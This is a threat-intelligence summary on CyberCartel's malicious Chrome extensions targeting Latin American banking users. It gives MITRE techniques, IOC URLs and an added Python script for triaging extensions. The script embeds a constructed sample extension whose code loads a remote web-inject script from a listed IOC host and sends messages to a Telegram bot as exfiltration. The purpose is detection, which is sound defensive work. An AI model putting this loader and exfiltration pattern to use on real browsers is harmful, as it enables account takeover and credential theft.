[Cyware] Unveiling the latest banking trojan threats in LATAM

CyberCartel is expanding its LATAM campaigns by leveraging Malware-as-a-Service to deploy banking trojans that target Chromium-based browsers through malicious Chrome extensions. The campaign uses web injects, Man-in-the-Browser techniques, and Telegram-based C2 for data exfiltration and updates; users are urged to install extensions only from trusted sources to mitigate risk. #CyberCartel #Caiman

Key points

  • CyberCartel uses Malware-as-a-Service to deploy banking trojans that target Chromium-based browsers in LATAM.
  • The malicious Chrome extensions steal credentials, capture screenshots and cookies, and inject phishing scripts into the pages a victim visits.
  • Web injects let the operators bypass two-factor authentication and take over user accounts.
  • Telegram carries real-time configuration updates and C2 communication, which lets the operators retarget campaigns quickly.
  • Campaigns focus on financial institutions and government offices in LATAM, with extensive regional activity.
  • The technical components include manifest permissions, content scripts, background scripts, and a Telegram-driven C2 approach.
  • Underground marketplaces offer template builders that lower the barrier to deploying malicious extensions and campaigns.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Link – Victims reach a phishing site and download the initial file. “The Victim unknowingly visits a phishing website and downloads a file”
  • [T1056] Input Capture (Web Injects) – Web injects and Man-in-the-Browser activity manipulate live web sessions to steal credentials and session data. “Web injects are back on the rise. They are powerful malicious tools integrated with multiple banking trojans that permit a threat actor to bypass two-factor authentication (2FA) and compromise a user’s bank account.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 traffic over web protocols, with Telegram carrying configuration updates and data transmission. “To ensure its persistence, the malware employs a flexible command and control (C2) system and adaptive configuration, often communicated via a Telegram channel.”
  • [T1041] Exfiltration Over C2 Channel – Stolen data is sent to the C2 server over the same channel. “The stolen information is sent to a Command and Control (C&C) server”

Indicators of Compromise

  • [URL] context – https://facturacionmexico.net/ok.js, https://dlxfreights.site/mx/sbi/main.js, and other related domains
  • [URL] context – https://css.imagesccs.com/jquery.js, https://www.cssangular.com/jquery.js, https://www.angularcss.com/jquery.js
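The following Python script is an added example, not code from the Cyware summary or the Security Intelligence article, that ties the key points about manifest permissions, content scripts, background scripts and Telegram C2 to the IOC list above. It triages an unpacked Chromium extension directory: it flags the manifest permissions that grant cookie theft, tab screenshots and script injection, and greps the extension's JavaScript for the IOC hosts listed on this page plus Telegram's Bot API host. The sample extension it writes to a temporary directory is constructed for the demo, the Telegram token is a placeholder, and the assumption that a Telegram-driven C2 reaches api.telegram.org is mine, not the article's.

```python
"""Triage an unpacked Chromium extension for the capabilities described above (added example)."""
import json
import os
import re
import tempfile

# Hosts taken from this page's Indicators of Compromise list.
IOC_HOSTS = {
    "facturacionmexico.net", "dlxfreights.site", "css.imagesccs.com",
    "www.cssangular.com", "www.angularcss.com",
}
# Assumption: a Telegram-driven C2 talks to Telegram's Bot API host.
C2_HOSTS = {"api.telegram.org"}

# Permissions that give an extension the capabilities listed in the key points.
RISKY_PERMISSIONS = {
    "cookies": "read session cookies for any permitted host",
    "tabs": "enumerate tabs and screenshot them via captureVisibleTab",
    "activeTab": "screenshot the active tab via captureVisibleTab",
    "scripting": "inject scripts into already-open pages",
    "webRequest": "observe requests, including credential POSTs",
}
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def triage_manifest(manifest):
    """Return human-readable findings for one parsed manifest.json (MV2 or MV3)."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for perm in sorted(perms):
        if perm in RISKY_PERMISSIONS:
            findings.append(f"permission {perm}: {RISKY_PERMISSIONS[perm]}")
        elif perm in BROAD_MATCHES:
            findings.append(f"host permission {perm}: reaches every site, banks included")
    for script in manifest.get("content_scripts", []):
        matches = script.get("matches", [])
        broad = sorted(m for m in matches if m in BROAD_MATCHES)
        if broad:
            findings.append(f"content script on {broad[0]}: can inject into any page")
        else:
            findings.append(f"content script targets {matches}: check for bank domains")
        if script.get("run_at") == "document_start":
            findings.append("content script at document_start: hooks the page before its own JS (web-inject vantage point)")
    background = manifest.get("background", {})
    if (background.get("service_worker") or background.get("scripts")) and perms & {"cookies", "tabs", "activeTab"}:
        findings.append("background script plus cookie/tab access: persistent collector for the content scripts")
    return findings


def scan_sources(ext_dir):
    """Map each JS/HTML file under ext_dir to the IOC or C2 hosts it references."""
    hits = {}
    for root, _dirs, files in os.walk(ext_dir):
        for name in files:
            if not name.endswith((".js", ".html")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = set(HOST_RE.findall(fh.read()))
            bad = sorted(hosts & (IOC_HOSTS | C2_HOSTS))
            if bad:
                hits[os.path.relpath(path, ext_dir)] = bad
    return hits


def triage_extension(ext_dir):
    """Triage one unpacked extension directory: manifest findings plus source hits."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    return {"manifest": triage_manifest(manifest), "sources": scan_sources(ext_dir)}


# Constructed sample with the shape described on this page; NOT the real Caiman code.
SAMPLE_FILES = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Factura Helper", "version": "1.0",
        "permissions": ["cookies", "tabs", "scripting", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
    }),
    "content.js": ("// remote web-inject loader (constructed sample)\n"
                   "const s = document.createElement('script');\n"
                   "s.src = 'https://css.imagesccs.com/jquery.js';\n"
                   "document.documentElement.appendChild(s);\n"),
    "background.js": ("// exfiltration to a Telegram bot (constructed sample, placeholder token)\n"
                      "const TOKEN = 'PLACEHOLDER';\n"
                      "chrome.runtime.onMessage.addListener((msg) => {\n"
                      "  fetch('https://api.telegram.org/bot' + TOKEN + '/sendMessage',\n"
                      "        {method: 'POST', body: JSON.stringify(msg)});\n"
                      "});\n"),
}


def demo():
    """Write the constructed sample extension to a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as ext_dir:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(ext_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return triage_extension(ext_dir)


if __name__ == "__main__":
    result = demo()
    for line in result["manifest"]:
        print("manifest:", line)
    for path, hosts in result["sources"].items():
        print("source:", path, "->", ", ".join(hosts))
```

To hunt on a real endpoint, call `triage_extension()` on each version directory under the profile's extension store (`~/.config/google-chrome/Default/Extensions/<id>/<version>/` on Linux, `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>\` on Windows). Treat the manifest findings as triage rather than a verdict: legitimate password managers and ad blockers also ask for cookies, tabs and `<all_urls>`, so a source-file hit on one of the listed hosts is the stronger signal, and the host list should be extended as the article's IOC set grows.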

Read more: https://securityintelligence.com/posts/unveiling-latest-banking-trojan-threats-latam